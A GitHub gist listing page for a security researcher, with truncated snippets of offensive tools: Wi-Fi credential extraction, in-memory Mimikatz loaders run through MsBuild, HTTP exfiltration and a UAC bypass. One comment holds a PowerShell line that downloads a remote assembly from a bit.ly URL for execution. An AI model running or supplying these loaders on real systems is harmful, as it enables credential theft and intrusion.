I hereby claim:
- I am leoloobeek on github.
- I am leoloobeek (https://keybase.io/leoloobeek) on keybase.
- I have a public key ASCyIsv1dP110VtA9CuMQ7YPLZ758Seyi8O5hu_ww7ZDVgo
To claim this, I am signing this object:
Leo Loobeek leoloobeek
leoloobeek
/ Extract-WiFi-Creds.ps1
Created
October 3, 2017 02:14
— forked from gfoss/Extract-WiFi-Creds.ps1
Simple script to extract locally-stored Wi-Fi Credentials
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #====================================# | |
| # Extract Wi-Fi Credentials # | |
| # greg . foss @ owasp . org # | |
| # v0.1 -- July, 2017 # | |
| #====================================# | |
| # Licensed under the MIT License | |
| <# |
leoloobeek
/ keybase.md
Created
September 30, 2017 04:14
leoloobeek
/ LinkedInScript.js
Created
August 24, 2017 15:16
https://github.com/rj4yb3/misc/blob/master/LinkedInScrape.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ---PLEASE NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY--- | |
| Script to scrape linkedin contacts for a certain company or search | |
| Authors - Erkin Djindjiev (@SeaErkin) | |
| Ryan Bradbury (@rj4yb3) | |
| Instructions - | |
| 1) navigate the first page of contacts | |
| 2) open your web browser developer tools | |
| 3) modify the pageLimit variable to fit the # of pages you'd like to scrape |
leoloobeek
/ LoadMethodScanner.ps1
Created
July 28, 2017 02:48
— forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| # Load dnlib with Add-Type first | |
| # dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
| # Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
| filter Get-AssemblyLoadReference { | |
| param ( | |
| [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
| [Alias('FullName')] | |
| [String] | |
| [ValidateNotNullOrEmpty()] |
leoloobeek
/ netkatz.cs
Last active
July 26, 2024 04:05
Downloads and Executes Mimikatz In Memory From GitHub
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
leoloobeek
/ katz.xml
Created
July 27, 2017 22:54
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
leoloobeek
/ msbuilder.xml
Created
July 24, 2017 13:15
MSBuild Execute Assembly From Environment Variable
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml --> | |
| <!-- Populate the Env Var like this or many other ways: --> | |
| <!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') --> | |
| <!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered --> | |
| <!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> |
leoloobeek
/ rc4.vbs
Last active
August 23, 2024 14:34
In case you ever need VBS, RC4, and have base64 encrypted bytes. I'm probably the only person who did.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'https://bytes.com/topic/access/insights/906671-rc4-encryption-algorithm-vba-vbscript | |
| ' Note: There are known weaknesses to RC4 and should not be relied on | |
| Function RC4(byteMessage, strKey) | |
| Dim kLen, x, y, i, j, temp | |
| Dim s(256), k(256) | |
| For a = 0 To 255 | |
| s(a) = a | |
| k(a) = 0 | |
| Next | |
| klen = Len(strKey) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| // httpxfil | |
| // Leo Loobeek 2017 | |
| // | |
| // PowerShell code taken from | |
| // https://github.com/EmpireProject/Empire | |
| // | |
| // Exfiltrate a file by encrypting and | |
| // sending via HTTP/S. This was written |
leoloobeek
/ EventVwrBypass.cs
Last active
June 6, 2023 08:50
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Win32; | |
| /* | |
| InstallUtil.exe C# version of Event Viewer UAC bypass |